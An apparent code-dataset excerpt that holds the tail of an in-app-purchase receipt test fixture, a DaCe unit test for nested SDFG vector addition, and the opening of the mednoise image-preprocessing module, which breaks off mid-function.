E5SUNJM01ESTJZVGM1TXpjNVptUmtZakZqTmpjNU1XRm1OVE13TW1FMlpUVTFNbVU0TnpCaVlqY3hJanNLQ1NKdmNtbG5hVzVoYkMxMGNtRnVjMkZqZEdsdmJpMXBaQ0lnUFNBaU1qTXdNREF3TURJME5qQTJPRFEzSWpzS0NTSmlkbkp6SWlBOUlDSXhMakFpT3dvSkltRndjQzFwZEdWdExXbGtJaUE5SUNJMU56WTVNVGMwTWpVaU93b0pJblJ5WVc1ellXTjBhVzl1TFdsa0lpQTlJQ0l5TXpBd01EQXdNalEyTURZNE5EY2lPd29KSW5GMVlXNTBhWFI1SWlBOUlDSXhJanNLQ1NKdmNtbG5hVzVoYkMxd2RYSmphR0Z6WlMxa1lYUmxMVzF6SWlBOUlDSXhNelUzT0RZeU9UQTJPVGszSWpzS0NTSjFibWx4ZFdVdGRtVnVaRzl5TFdsa1pXNTBhV1pwWlhJaUlEMGdJalJHTWtKRFEwWXhMVGhGTVRjdE5EYzVNQzFDUTBNNUxVUkdNRVkzTURjME1EZEVNU0k3Q2draWFYUmxiUzFwWkNJZ1BTQWlOVGMyT1RJeE1qQXlJanNLQ1NKMlpYSnphVzl1TFdWNGRHVnlibUZzTFdsa1pXNTBhV1pwWlhJaUlEMGdJakV4T1RBek1UUTBJanNLQ1NKd2NtOWtkV04wTFdsa0lpQTlJQ0poY3k1allXNTJMbVJ5WVhkeGRXVnpkQzV3Y205a2RXTjBjeTVqYjJsdWN5NHhNREFpT3dvSkluQjFjbU5vWVhObExXUmhkR1VpSUQwZ0lqSXdNVE10TURFdE1URWdNREE2TURnNk1qWWdSWFJqTDBkTlZDSTdDZ2tpYjNKcFoybHVZV3d0Y0hWeVkyaGhjMlV0WkdGMFpTSWdQU0FpTWpBeE15MHdNUzB4TVNBd01Eb3dPRG95TmlCRmRHTXZSMDFVSWpzS0NTSmlhV1FpSUQwZ0ltRnpMbU5oYm5ZdVpISmhkM0YxWlhOMElqc0tDU0p3ZFhKamFHRnpaUzFrWVhSbExYQnpkQ0lnUFNBaU1qQXhNeTB3TVMweE1DQXhOam93T0RveU5pQkJiV1Z5YVdOaEwweHZjMTlCYm1kbGJHVnpJanNLZlE9PSI7CgkicG9kIiA9ICIyMyI7Cgkic2lnbmluZy1zdGF0dXMiID0gIjAiOwp9'
# def balance():
# return self.api_post('/api/economy/balance', user=user)['balance']
# old_balance = balance()
# resp = self.api_post('/api/iap/process_receipt', {'receipt_data': data}, user=user)
# self.assertAPISuccess(resp)
# self.assertEqual(balance() - old_balance, resp['balance'])
| 413.923077 | 3,499 | 0.954562 | 285 | 10,762 | 35.978947 | 0.4 | 0.002536 | 0.013068 | 0.025746 | 0.322021 | 0.322021 | 0.322021 | 0.322021 | 0.322021 | 0.322021 | 0 | 0.106673 | 0.018305 | 10,762 | 25 | 3,500 | 430.48 | 0.86389 | 0.968686 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.8 | 0 | 0.8 | 0 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
ad207593d53f1308acace20e693bc6b1ffeb1848 | 12,212 | py | Python | tests/unique_nested_sdfg_test.py | Walon1998/dace | 95ddfd3e9a5c654f0f0d66d026e0b64ec0f028a0 | [
"BSD-3-Clause"
] | 1 | 2022-03-11T13:36:34.000Z | 2022-03-11T13:36:34.000Z | tests/unique_nested_sdfg_test.py | Walon1998/dace | 95ddfd3e9a5c654f0f0d66d026e0b64ec0f028a0 | [
"BSD-3-Clause"
] | null | null | null | tests/unique_nested_sdfg_test.py | Walon1998/dace | 95ddfd3e9a5c654f0f0d66d026e0b64ec0f028a0 | [
"BSD-3-Clause"
] | null | null | null | # Copyright 2019-2021 ETH Zurich and the DaCe authors. All rights reserved.
# The scope of the test is to verify that code nested SDFGs with a unique name is generated only once
# The nested SDFG compute vector addition
import dace
import numpy as np
import argparse
import subprocess
from dace.memlet import Memlet
size_n = 32
size_m = 64
def make_vecAdd_sdfg(sdfg_name: str, dtype=dace.float32):
'''
Builds an SDFG for vector addition
:param sdfg_name: name to give to the sdfg
:param dtype: used data type
:return: an SDFG
'''
n = dace.symbol("size")
vecAdd_sdfg = dace.SDFG(sdfg_name)
vecAdd_state = vecAdd_sdfg.add_state("vecAdd_nested")
# ---------- ----------
# ACCESS NODES
# ---------- ----------
x_name = "x"
y_name = "y"
z_name = "z"
vecAdd_sdfg.add_array(x_name, [n], dtype=dtype)
vecAdd_sdfg.add_array(y_name, [n], dtype=dtype)
vecAdd_sdfg.add_array(z_name, [n], dtype=dtype)
x_in = vecAdd_state.add_read(x_name)
y_in = vecAdd_state.add_read(y_name)
z_out = vecAdd_state.add_write(z_name)
# ---------- ----------
# COMPUTE
# ---------- ----------
vecMap_entry, vecMap_exit = vecAdd_state.add_map('vecAdd_map', dict(i='0:{}'.format(n)))
vecAdd_tasklet = vecAdd_state.add_tasklet('vecAdd_task', ['x_con', 'y_con'], ['z_con'], 'z_con = x_con + y_con')
vecAdd_state.add_memlet_path(x_in,
vecMap_entry,
vecAdd_tasklet,
dst_conn='x_con',
memlet=dace.Memlet.simple(x_in.data, 'i'))
vecAdd_state.add_memlet_path(y_in,
vecMap_entry,
vecAdd_tasklet,
dst_conn='y_con',
memlet=dace.Memlet.simple(y_in.data, 'i'))
vecAdd_state.add_memlet_path(vecAdd_tasklet,
vecMap_exit,
z_out,
src_conn='z_con',
memlet=dace.Memlet.simple(z_out.data, 'i'))
return vecAdd_sdfg
def make_nested_vecAdd_sdfg(sdfg_name: str, dtype=dace.float32):
'''
Builds an SDFG for vector addition. Internally has a nested SDFG in charge of actually
performing the computation.
:param sdfg_name: name to give to the sdfg
:param dtype: used data type
:return: an SDFG
'''
n = dace.symbol("size")
vecAdd_parent_sdfg = dace.SDFG(sdfg_name)
vecAdd_parent_state = vecAdd_parent_sdfg.add_state("vecAdd_parent")
# ---------- ----------
# ACCESS NODES
# ---------- ----------
x_name = "x"
y_name = "y"
z_name = "z"
vecAdd_parent_sdfg.add_array(x_name, [n], dtype=dtype)
vecAdd_parent_sdfg.add_array(y_name, [n], dtype=dtype)
vecAdd_parent_sdfg.add_array(z_name, [n], dtype=dtype)
x_in = vecAdd_parent_state.add_read(x_name)
y_in = vecAdd_parent_state.add_read(y_name)
z_out = vecAdd_parent_state.add_write(z_name)
# ---------- ----------
# COMPUTE
# ---------- ----------
# Create the nested SDFG for vector addition
nested_sdfg_name = sdfg_name + "_nested"
to_nest = make_vecAdd_sdfg(nested_sdfg_name, dtype)
# Nest it and connect memlets
nested_sdfg = vecAdd_parent_state.add_nested_sdfg(to_nest, vecAdd_parent_sdfg, {"x", "y"}, {"z"})
vecAdd_parent_state.add_memlet_path(x_in,
nested_sdfg,
dst_conn="x",
memlet=Memlet.simple(x_in, "0:size", num_accesses=n))
vecAdd_parent_state.add_memlet_path(y_in,
nested_sdfg,
dst_conn="y",
memlet=Memlet.simple(y_in, "0:size", num_accesses=n))
vecAdd_parent_state.add_memlet_path(nested_sdfg,
z_out,
src_conn="z",
memlet=Memlet.simple(z_out, "0:size", num_accesses=n))
return vecAdd_parent_sdfg
def make_nested_sdfg_cpu_single_state():
'''
Builds an SDFG with two identical nested SDFGs
'''
n = dace.symbol("n")
m = dace.symbol("m")
sdfg = dace.SDFG("two_vecAdd")
state = sdfg.add_state("state")
# build the first axpy: works with x,y, and z of n-elements
# ATTENTION: this two nested SDFG must have the same name as they are equal
to_nest = make_vecAdd_sdfg("vecAdd")
sdfg.add_array("x", [n], dace.float32)
sdfg.add_array("y", [n], dace.float32)
sdfg.add_array("z", [n], dace.float32)
x = state.add_read("x")
y = state.add_read("y")
z = state.add_write("z")
# add it as nested SDFG, with proper symbol mapping
nested_sdfg = state.add_nested_sdfg(to_nest, sdfg, {"x", "y"}, {"z"}, {"size": "n"})
state.add_memlet_path(x, nested_sdfg, dst_conn="x", memlet=Memlet.simple(x, "0:n", num_accesses=n))
state.add_memlet_path(y, nested_sdfg, dst_conn="y", memlet=Memlet.simple(y, "0:n", num_accesses=n))
state.add_memlet_path(nested_sdfg, z, src_conn="z", memlet=Memlet.simple(z, "0:n", num_accesses=n))
# Build the second axpy: works with v,w and u of m elements
to_nest = make_vecAdd_sdfg("vecAdd")
sdfg.add_array("v", [m], dace.float32)
sdfg.add_array("w", [m], dace.float32)
sdfg.add_array("u", [m], dace.float32)
v = state.add_read("v")
w = state.add_read("w")
u = state.add_write("u")
nested_sdfg = state.add_nested_sdfg(to_nest, sdfg, {"x", "y"}, {"z"}, {"size": "m"})
state.add_memlet_path(v, nested_sdfg, dst_conn="x", memlet=Memlet.simple(v, "0:m", num_accesses=m))
state.add_memlet_path(w, nested_sdfg, dst_conn="y", memlet=Memlet.simple(w, "0:m", num_accesses=m))
state.add_memlet_path(nested_sdfg, u, src_conn="z", memlet=Memlet.simple(u, "0:m", num_accesses=m))
return sdfg
def make_nested_sdfg_cpu_two_states():
'''
Builds an SDFG with two nested SDFGs, one per state
'''
n = dace.symbol("n")
m = dace.symbol("m")
sdfg = dace.SDFG("two_vecAdd")
state_0 = sdfg.add_state("state_0")
# build the first axpy: works with x,y, and z of n-elements
# ATTENTION: this two nested SDFG must have the same name as they are equal
to_nest = make_vecAdd_sdfg("vecAdd")
sdfg.add_array("x", [n], dace.float32)
sdfg.add_array("y", [n], dace.float32)
sdfg.add_array("z", [n], dace.float32)
x = state_0.add_read("x")
y = state_0.add_read("y")
z = state_0.add_write("z")
# add it as nested SDFG, with proper symbol mapping
nested_sdfg = state_0.add_nested_sdfg(to_nest, sdfg, {"x", "y"}, {"z"}, {"size": "n"})
state_0.add_memlet_path(x, nested_sdfg, dst_conn="x", memlet=Memlet.simple(x, "0:n", num_accesses=n))
state_0.add_memlet_path(y, nested_sdfg, dst_conn="y", memlet=Memlet.simple(y, "0:n", num_accesses=n))
state_0.add_memlet_path(nested_sdfg, z, src_conn="z", memlet=Memlet.simple(z, "0:n", num_accesses=n))
# Build the second axpy: add another state works with v,w and u of m elements
state_1 = sdfg.add_state_after(state_0, "state_1")
to_nest = make_vecAdd_sdfg("vecAdd")
sdfg.add_array("v", [m], dace.float32)
sdfg.add_array("w", [m], dace.float32)
sdfg.add_array("u", [m], dace.float32)
v = state_1.add_read("v")
w = state_1.add_read("w")
u = state_1.add_write("u")
nested_sdfg = state_1.add_nested_sdfg(to_nest, sdfg, {"x", "y"}, {"z"}, {"size": "m"})
state_1.add_memlet_path(v, nested_sdfg, dst_conn="x", memlet=Memlet.simple(v, "0:m", num_accesses=m))
state_1.add_memlet_path(w, nested_sdfg, dst_conn="y", memlet=Memlet.simple(w, "0:m", num_accesses=m))
state_1.add_memlet_path(nested_sdfg, u, src_conn="z", memlet=Memlet.simple(u, "0:m", num_accesses=m))
return sdfg
def make_nested_nested_sdfg_cpu():
'''
Builds an SDFG with two nested SDFGs, each of them has internally another Nested SDFG
'''
n = dace.symbol("n")
m = dace.symbol("m")
sdfg = dace.SDFG("nested_nested_vecAdd")
state_0 = sdfg.add_state("state_0")
# build the first axpy: works with x,y, and z of n-elements
# ATTENTION: this two nested SDFG must have the same name as they are equal
to_nest = make_nested_vecAdd_sdfg("vecAdd")
sdfg.add_array("x", [n], dace.float32)
sdfg.add_array("y", [n], dace.float32)
sdfg.add_array("z", [n], dace.float32)
x = state_0.add_read("x")
y = state_0.add_read("y")
z = state_0.add_write("z")
# add it as nested SDFG, with proper symbol mapping
nested_sdfg = state_0.add_nested_sdfg(to_nest, sdfg, {"x", "y"}, {"z"}, {"size": "n"})
state_0.add_memlet_path(x, nested_sdfg, dst_conn="x", memlet=Memlet.simple(x, "0:n", num_accesses=n))
state_0.add_memlet_path(y, nested_sdfg, dst_conn="y", memlet=Memlet.simple(y, "0:n", num_accesses=n))
state_0.add_memlet_path(nested_sdfg, z, src_conn="z", memlet=Memlet.simple(z, "0:n", num_accesses=n))
# Build the second axpy: add another state works with v,w and u of m elements
state_1 = sdfg.add_state_after(state_0, "state_1")
to_nest = make_nested_vecAdd_sdfg("vecAdd")
sdfg.add_array("v", [m], dace.float32)
sdfg.add_array("w", [m], dace.float32)
sdfg.add_array("u", [m], dace.float32)
v = state_1.add_read("v")
w = state_1.add_read("w")
u = state_1.add_write("u")
nested_sdfg = state_1.add_nested_sdfg(to_nest, sdfg, {"x", "y"}, {"z"}, {"size": "m"})
state_1.add_memlet_path(v, nested_sdfg, dst_conn="x", memlet=Memlet.simple(v, "0:m", num_accesses=m))
state_1.add_memlet_path(w, nested_sdfg, dst_conn="y", memlet=Memlet.simple(w, "0:m", num_accesses=m))
state_1.add_memlet_path(nested_sdfg, u, src_conn="z", memlet=Memlet.simple(u, "0:m", num_accesses=m))
return sdfg
def test_single_state():
sdfg = make_nested_sdfg_cpu_single_state()
two_axpy = sdfg.compile()
x = np.random.rand(size_n).astype(np.float32)
y = np.random.rand(size_n).astype(np.float32)
z = np.random.rand(size_n).astype(np.float32)
v = np.random.rand(size_m).astype(np.float32)
w = np.random.rand(size_m).astype(np.float32)
u = np.random.rand(size_m).astype(np.float32)
two_axpy(x=x, y=y, z=z, v=v, w=w, u=u, n=size_n, m=size_m)
ref1 = np.add(x, y)
ref2 = np.add(v, w)
diff1 = np.linalg.norm(ref1 - z) / size_n
diff2 = np.linalg.norm(ref2 - u) / size_m
# There is no need to check that the Nested SDFG has been generated only once. If this is not the case
# the test will fail while compiling
assert diff1 <= 1e-5 and diff2 <= 1e-5
def test_two_states():
sdfg = make_nested_sdfg_cpu_two_states()
two_axpy = sdfg.compile()
x = np.random.rand(size_n).astype(np.float32)
y = np.random.rand(size_n).astype(np.float32)
z = np.random.rand(size_n).astype(np.float32)
v = np.random.rand(size_m).astype(np.float32)
w = np.random.rand(size_m).astype(np.float32)
u = np.random.rand(size_m).astype(np.float32)
two_axpy(x=x, y=y, z=z, v=v, w=w, u=u, n=size_n, m=size_m)
ref1 = np.add(x, y)
ref2 = np.add(v, w)
diff1 = np.linalg.norm(ref1 - z) / size_n
diff2 = np.linalg.norm(ref2 - u) / size_m
assert diff1 <= 1e-5 and diff2 <= 1e-5
def test_nested_nested():
sdfg = make_nested_nested_sdfg_cpu()
two_axpy = sdfg.compile()
x = np.random.rand(size_n).astype(np.float32)
y = np.random.rand(size_n).astype(np.float32)
z = np.random.rand(size_n).astype(np.float32)
v = np.random.rand(size_m).astype(np.float32)
w = np.random.rand(size_m).astype(np.float32)
u = np.random.rand(size_m).astype(np.float32)
two_axpy(x=x, y=y, z=z, v=v, w=w, u=u, n=size_n, m=size_m)
ref1 = np.add(x, y)
ref2 = np.add(v, w)
diff1 = np.linalg.norm(ref1 - z) / size_n
diff2 = np.linalg.norm(ref2 - u) / size_m
assert diff1 <= 1e-5 and diff2 <= 1e-5
if __name__ == "__main__":
test_single_state()
test_two_states()
test_nested_nested()
| 34.991404 | 116 | 0.62021 | 1,938 | 12,212 | 3.664603 | 0.083075 | 0.077443 | 0.040552 | 0.040552 | 0.845255 | 0.808927 | 0.765559 | 0.742467 | 0.718812 | 0.683892 | 0 | 0.019541 | 0.228955 | 12,212 | 348 | 117 | 35.091954 | 0.734707 | 0.15624 | 0 | 0.60396 | 1 | 0 | 0.042183 | 0 | 0 | 0 | 0 | 0 | 0.014851 | 1 | 0.039604 | false | 0 | 0.024752 | 0 | 0.089109 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
ad20eb6696c1093da27b93cb38d8fef17da619a9 | 60,793 | py | Python | src/mednoise/all.py | mednoise/mednoise | 533a33973e8453892895bb4f8dfcb5814891600d | [
"Apache-2.0"
] | 1 | 2021-07-10T19:18:27.000Z | 2021-07-10T19:18:27.000Z | src/mednoise/all.py | mednoise/mednoise | 533a33973e8453892895bb4f8dfcb5814891600d | [
"Apache-2.0"
] | null | null | null | src/mednoise/all.py | mednoise/mednoise | 533a33973e8453892895bb4f8dfcb5814891600d | [
"Apache-2.0"
] | 2 | 2021-07-16T09:24:41.000Z | 2022-03-17T21:31:38.000Z | import tkinter as tk
from PIL import ImageTk, Image, ImageDraw
import ntpath
import glob2 as glob
from collections import OrderedDict
import datetime
import numpy as np
from scipy.spatial import distance
def about(header=False):
"""
Provides a header and front-end interface for new users and pipeline workflows.
Parameters
----------
header : boolean, default: False
Determines whether to display a header or a front-end interface. By default, this is set
to ``False``, meaning that it automatically generates a front-end interface if passed.
Notes
-----
This is the most frontend aspect about **mednoise**. Beyond this, **mednoise** is
a series of scripts to be included in a terminal or pipeline workflow.
Examples
--------
>>> md.about()
#############################################################################################
8I
8I
8I gg
8I ""
,ggg,,ggg,,ggg, ,ggg, ,gggg,8I ,ggg,,ggg, ,ggggg, gg ,g, ,ggg,
,8" "8P" "8P" "8, i8" "8i dP" "Y8I ,8" "8P" "8, dP" "Y8ggg 88 ,8'8, i8" "8i
I8 8I 8I 8I I8, ,8I i8' ,8I I8 8I 8I i8' ,8I 88 ,8' Yb I8, ,8I
,dP 8I 8I Yb, `YbadP' ,d8, ,d8b,,dP 8I Yb,,d8, ,d8' _,88,_,8'_ 8) `YbadP'
8P' 8I 8I `Y8888P"Y888P"Y8888P"`Y88P' 8I `Y8P"Y8888P" 8P""Y8P' "YY8P8P888P"Y888
#############################################################################################
>>> md.about(header=True)
#############################################################################################
8I
8I
8I gg
8I ""
,ggg,,ggg,,ggg, ,ggg, ,gggg,8I ,ggg,,ggg, ,ggggg, gg ,g, ,ggg,
,8" "8P" "8P" "8, i8" "8i dP" "Y8I ,8" "8P" "8, dP" "Y8ggg 88 ,8'8, i8" "8i
I8 8I 8I 8I I8, ,8I i8' ,8I I8 8I 8I i8' ,8I 88 ,8' Yb I8, ,8I
,dP 8I 8I Yb, `YbadP' ,d8, ,d8b,,dP 8I Yb,,d8, ,d8' _,88,_,8'_ 8) `YbadP'
8P' 8I 8I `Y8888P"Y888P"Y8888P"`Y88P' 8I `Y8P"Y8888P" 8P""Y8P' "YY8P8P888P"Y888
#############################################################################################
Copyright 2021 Ravi Bandaru
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this package except in compliance with the License.
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
#############################################################################################
Welcome to mednoise, a python package that contains algorithms to handle and pre-process
large amounts of image-based metadata to remove noise and enhance the accuracy of machine
learning and deep learning models for scientific research.
#############################################################################################
You can bring up the help menu (h) or exit (e).
"""
if header==True:
logo = """
#############################################################################################
8I
8I
8I gg
8I ""
,ggg,,ggg,,ggg, ,ggg, ,gggg,8I ,ggg,,ggg, ,ggggg, gg ,g, ,ggg,
,8" "8P" "8P" "8, i8" "8i dP" "Y8I ,8" "8P" "8, dP" "Y8ggg 88 ,8'8, i8" "8i
I8 8I 8I 8I I8, ,8I i8' ,8I I8 8I 8I i8' ,8I 88 ,8' Yb I8, ,8I
,dP 8I 8I Yb, `YbadP' ,d8, ,d8b,,dP 8I Yb,,d8, ,d8' _,88,_,8'_ 8) `YbadP'
8P' 8I 8I `Y8888P"Y888P"Y8888P"`Y88P' 8I `Y8P"Y8888P" 8P""Y8P' "YY8P8P888P"Y888
#############################################################################################
"""
print(logo)
global storeddictionary
global analyzedval
storeddictionary = 1
analyzedval = 1
if header==False:
logo = """
#############################################################################################
8I
8I
8I gg
8I ""
,ggg,,ggg,,ggg, ,ggg, ,gggg,8I ,ggg,,ggg, ,ggggg, gg ,g, ,ggg,
,8" "8P" "8P" "8, i8" "8i dP" "Y8I ,8" "8P" "8, dP" "Y8ggg 88 ,8'8, i8" "8i
I8 8I 8I 8I I8, ,8I i8' ,8I I8 8I 8I i8' ,8I 88 ,8' Yb I8, ,8I
,dP 8I 8I Yb, `YbadP' ,d8, ,d8b,,dP 8I Yb,,d8, ,d8' _,88,_,8'_ 8) `YbadP'
8P' 8I 8I `Y8888P"Y888P"Y8888P"`Y88P' 8I `Y8P"Y8888P" 8P""Y8P' "YY8P8P888P"Y888
#############################################################################################
Copyright 2021 Ravi Bandaru
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this package except in compliance with the License.
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
#############################################################################################
Welcome to mednoise, a python package that contains algorithms to handle and pre-process
large amounts of image-based metadata to remove noise and enhance the accuracy of machine
learning and deep learning models for scientific research.
#############################################################################################
You can bring up the help menu (h) or exit (e).
"""
print(logo)
response = input(" ")
print(" #############################################################################################")
print("")
if response == "e":
print(" exiting.")
if response == "h":
print(" documentation can be accessed at https://mednoise.github.io/documentation.")
print("")
print(" #############################################################################################")
if header != True and header != False:
raise ValueError('header argument was incorrectly specified. note that it is a boolean attribute.')
about(header=True)
def manual_merge(filepath, find = (0,0,0), replace = (255,255,255)):
"""
Combines multiple input images of the same size to yield one binary image that allows for
common feature detection.
Parameters
----------
filepath : string
A filepath for images to be selected from. Since **mednoise** uses ``glob``,
it can take any argument that ``glob`` can parse through.
find : RGB tuple, default: (0,0,0)
A value that indicates silenced noise. Usually is considered the
background color of the input image, often ``(0,0,0)``.
replace : RGB tuple, default: (255,255,255)
A value that indicates complete noise. Usually is considered the
complement of the background color of the input image, often ``(255,255,255)``.
Notes
-----
This allows users to find common features and then pass them through their own package scripts,
or predeveloped scripts like ``md.manual_find`` and ``md.manual_edit``.
Examples
--------
>>> md.manual_merge("/example/directory/*, (0,0,0), (255, 0, 0)) #for 4 images, yielding the below image
md.manual_merge - Image 1 Importing:0:00:01
md.manual_merge - Image 2 Importing:0:00:01md.manual_merge - Image 1 Pixel Cleaning:0:00:00
md.manual_merge - Image 2 Pixel Cleaning:0:00:00
md.manual_merge - Image 1 and 2 Pixel Merge:0:00:50
md.manual_merge - Image 3 Pixel Merge:0:00:59
md.manual_merge - Image 4 Pixel Merge:0:00:51
md.manual_merge - Final Merge and Conversion:0:00:50
md.manual_merge - Image Save:0:00:01
.. figure:: combined_image.png
:scale: 50 %
:align: center
``md.manual_merge`` output image
"""
files = glob.glob(filepath)
original = []
startTime = datetime.datetime.now().replace(microsecond=0)
image = Image.open(files[0])
rgb1 = image.convert('RGB')
width, height = image.size
pixel_values1 = list(rgb1.getdata())
endTime = datetime.datetime.now().replace(microsecond=0)
durationTime = endTime - startTime
print ("md.manual_merge - Image 1 Importing:" + str(durationTime))
startTime = datetime.datetime.now().replace(microsecond=0)
image2 = Image.open(files[1])
rgb2 = image2.convert('RGB')
pixel_values2 = list(rgb2.getdata())
endTime = datetime.datetime.now().replace(microsecond=0)
durationTime = endTime - startTime
print ("md.manual_merge - Image 2 Importing:" + str(durationTime))
startTime = datetime.datetime.now().replace(microsecond=0)
for index, item in enumerate(pixel_values1):
if item != find:
pixel_values1[index] = 2
else:
pixel_values1[index] = 1
endTime = datetime.datetime.now().replace(microsecond=0)
durationTime = endTime - startTime
print ("md.manual_merge - Image 1 Pixel Cleaning:" + str(durationTime))
startTime = datetime.datetime.now().replace(microsecond=0)
for index, item in enumerate(pixel_values2):
if item != find:
pixel_values2[index] = 2
else:
pixel_values2[index] = 1
endTime = datetime.datetime.now().replace(microsecond=0)
durationTime = endTime - startTime
print ("md.manual_merge - Image 2 Pixel Cleaning:" + str(durationTime))
startTime = datetime.datetime.now().replace(microsecond=0)
for index, item in enumerate(pixel_values1) and enumerate(pixel_values2):
print(round((100*index)/(width*height),1), end = "\r")
if pixel_values1[index] == 1 and pixel_values2[index]== 1:
original.append(1)
else:
original.append(2)
endTime = datetime.datetime.now().replace(microsecond=0)
durationTime = endTime - startTime
print ("md.manual_merge - Image 1 and 2 Pixel Merge:" + str(durationTime))
i=1
for index,item in enumerate(files):
startTime = datetime.datetime.now().replace(microsecond=0)
image = Image.open(files[index])
rgb1 = image.convert('RGB')
pixel_values1 = list(rgb1.getdata())
width, height = rgb1.size
for index, item in enumerate(pixel_values1):
if item != find:
pixel_values1[index] = 2
else:
pixel_values1[index] = 1
for index, item in enumerate(pixel_values1) and enumerate(original):
print(round((100*index)/(width*height),1), end = "\r")
if pixel_values1[index] == 1 and original[index]== 1:
original[index] = 1
else:
original[index] = 2
endTime = datetime.datetime.now().replace(microsecond=0)
durationTime = endTime - startTime
print ("md.manual_merge - Image", i, " Pixel Merge:" + str(durationTime))
i+=1
startTime = datetime.datetime.now().replace(microsecond=0)
for index, item in enumerate(original):
print(round((100*index)/(width*height),1), end = "\r")
if original[index]== 1:
original[index] = find
else:
original[index] = replace
endTime = datetime.datetime.now().replace(microsecond=0)
durationTime = endTime - startTime
print("md.manual_merge - Final Merge and Conversion:" + str(durationTime))
startTime = datetime.datetime.now().replace(microsecond=0)
image_out = Image.new("RGB",(width,height))
image_out.putdata(original)
image_out.save('combined_image.png')
endTime = datetime.datetime.now().replace(microsecond=0)
durationTime = endTime - startTime
print("md.manual_merge - Image Save:" + str(durationTime))
def manual_find(filepath):
"""
Offers an interface through tkinter to identify pixel coordinates and create tuple-lists that can be passed through a filter.
Parameters
----------
filepath : string
A filepath for images to be selected from. Must be a path to a file, not a directory or other ``glob`` parseable structure.
Notes
-----
This allows users to find polygon coordinates and then pass them through their own package scripts,
or predeveloped scripts like ``md.manual_edit``.
Examples
--------
>>> md.manual_find("/example/directory/file.png") #after four clicks on the tkinter interface
(51,78),
(51,275),
(7,261),
(8,78),
"""
window = tk.Tk()
window.title("Pixel Finder")
window.geometry("960x720")
window.configure(background='grey')
img = ImageTk.PhotoImage(Image.open(filepath))
panel = tk.Label(window, image = img)
panel.pack(side = "bottom", fill = "both", expand = "yes")
def pressed1(event):
print("(" + str(event.x) + "," + str(event.y) + ")" + ",")
window.bind('<Button-1>', pressed1)
window.mainloop()
def manual_edit(filepath, xy, find = (0,0,0)):
"""
Offers a manual method through which sections of input images can be silenced.
Parameters
----------
filepath : string
A filepath for images to be selected from. Must be a path to a file, not a directory or other ``glob`` parseable structure.
xy : tuple
A tuple of restraint tuples for the polygon to be silenced. This can be either generated
by setting the output of ``md.manual_find`` to a list or developing your own algorithm.
find : RGB tuple, default: (0,0,0)
A value that indicates silenced noise. Usually is considered the
background color of the input image, often ``(0,0,0)``.
Notes
-----
This allows users to silence polygon coordinates after then pass them through their own package scripts,
or predeveloped scripts like ``md.manual_merge`` or ``md.manual_find``.
Examples
--------
>>> restraints = [(473,91),(214,601),(764,626)]
>>> md.manual_edit("/example/directory/file.png", xy = restraints) #removing a triangle from input image
md.manual_edit - Image 1 Save:0:00:01
.. figure:: edited.png
:scale: 50 %
:align: center
``md.manual_edit`` output image
"""
files = glob.glob(filepath)
restraints = xy
for index,item in enumerate(files):
with Image.open(files[index]) as im:
startTime = datetime.datetime.now().replace(microsecond=0)
name = ntpath.basename(files[index])
size = len(name)
mod_string = name[:size - 4]
print(mod_string)
draw = ImageDraw.Draw(im)
draw.polygon(restraints, fill=find, outline=find)
im.save(mod_string + "_clean" + ".PNG")
endTime = datetime.datetime.now().replace(microsecond=0)
durationTime = endTime - startTime
print("md.manual_edit - Image " + str(index+1) + " Save:" + str(durationTime))
def manual_primer(filepath, find = (0,0,0)):
"""
Creates one binary image from an imput image that allows for common feature detection.
Parameters
----------
filepath : string
A filepath for images to be selected from. Must be a path to a file, not a directory or other ``glob`` parseable structure.
find : RGB tuple, default: (0,0,0)
A value that indicates silenced noise. Usually is considered the
background color of the input image, often ``(0,0,0)``.
Notes
-----
This function is almost entirely useless without an outside algorithm that a user develops. **mednoise**
is already optimized to not require primed images, so this function instead serves as a tool for user
developed algorithms that have not been optimized.
Examples
--------
>>> md.manual_primer("/example/directory/*")
md.manual_primer - Importing Images:0:00:00
md.manual_primer - Image 1 Importing:0:00:01
md.manual_primer - Image 1 Cleaning:0:00:00
md.manual_primer - Image 1 Conversion:0:00:47
md.manual_primer - Image 1 Image Save:0:00:01
.. figure:: primed.png
:scale: 50 %
:align: center
``md.manual_primer`` output image
"""
replace = (255,255,255)
startTime = datetime.datetime.now().replace(microsecond=0)
files = glob.glob(filepath)
original = []
endTime = datetime.datetime.now().replace(microsecond=0)
durationTime = endTime - startTime
print ("md.manual_primer - Importing Images:" + str(durationTime))
startTime = datetime.datetime.now().replace(microsecond=0)
for indexor,item in enumerate(files):
name = ntpath.basename(files[indexor])
size = len(name)
mod_string = name[:size - 4]
image = Image.open(files[indexor])
rgb1 = image.convert('RGB')
pixel_values1 = list(rgb1.getdata())
width, height = image.size
pixel_values1 = list(rgb1.getdata())
endTime = datetime.datetime.now().replace(microsecond=0)
durationTime = endTime - startTime
print ("md.manual_primer - Image" + " " + str(indexor+1) + " Importing:" + str(durationTime))
startTime = datetime.datetime.now().replace(microsecond=0)
for index, item in enumerate(pixel_values1):
if item != find:
pixel_values1[index] = 2
else:
pixel_values1[index] = 1
endTime = datetime.datetime.now().replace(microsecond=0)
durationTime = endTime - startTime
startTime = datetime.datetime.now().replace(microsecond=0)
print ("md.manual_primer - Image" + " " + str(indexor+1) +" Cleaning:" + str(durationTime))
startTime = datetime.datetime.now().replace(microsecond=0)
const = (width*height)/100
for index, item in enumerate(pixel_values1):
